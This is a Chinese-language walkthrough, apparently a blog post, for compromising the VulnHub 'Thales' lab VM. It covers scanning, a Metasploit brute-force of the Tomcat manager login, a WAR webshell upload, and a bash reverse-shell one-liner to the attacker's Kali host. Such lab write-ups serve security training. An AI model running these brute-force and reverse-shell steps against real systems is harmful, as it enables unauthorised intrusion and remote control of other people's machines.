Thales靶机在网络安全教学与实战中的应用与价值

1.下载好该靶机,将桥接模式改为NET网段并启动

https://download.vulnhub.com/thales/Thales.zip

2.借助kali来确定该靶机的IP

复制代码
arp-scan -l
nmap -O 192.168.56.101

3.访问改IP 192.168.56.101

4.点击manager app发现有个登录

使用msf爆破一下

复制代码
msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS 192.168.56.101
run

5.然后进行登录tomcat:role1,在这上传一个war包

6.然后访问这个包

7.用哥斯拉去进行连接

8.然后进行反弹shell

在kali进行监听

在终端运行

复制代码
bash -c 'bash -i>& /dev/tcp/192.168.56.102/8888 0>&1'

回到kali发现监听到

相关推荐
HMS Core18 分钟前
HarmonyOS免密认证方案 助力应用登录安全升级
安全·华为·harmonyos
Gauss松鼠会1 小时前
GaussDB权限管理:从RBAC到精细化控制的企业级安全实践
大数据·数据库·安全·database·gaussdb
小赖同学啊3 小时前
基于区块链的物联网(IoT)安全通信与数据共享的典型实例
物联网·安全·区块链
安全系统学习10 小时前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
聚铭网络15 小时前
案例精选 | 某省级税务局AI大数据日志审计中台应用实践
大数据·人工智能·web安全
GLAB-Mary16 小时前
AI会取代网络工程师吗?理解AI在网络安全中的角色
网络·人工智能·web安全
hanniuniu1316 小时前
AI时代API挑战加剧,API安全厂商F5护航企业数字未来
人工智能·安全
zhulangfly17 小时前
API接口安全-1:身份认证之传统Token VS JWT
安全
时时三省18 小时前
【时时三省】vectorcast使用教程
安全·安全架构
galaxylove19 小时前
Gartner发布最新指南:企业要构建防御性强且敏捷的网络安全计划以平衡安全保障与业务运营
网络·安全·web安全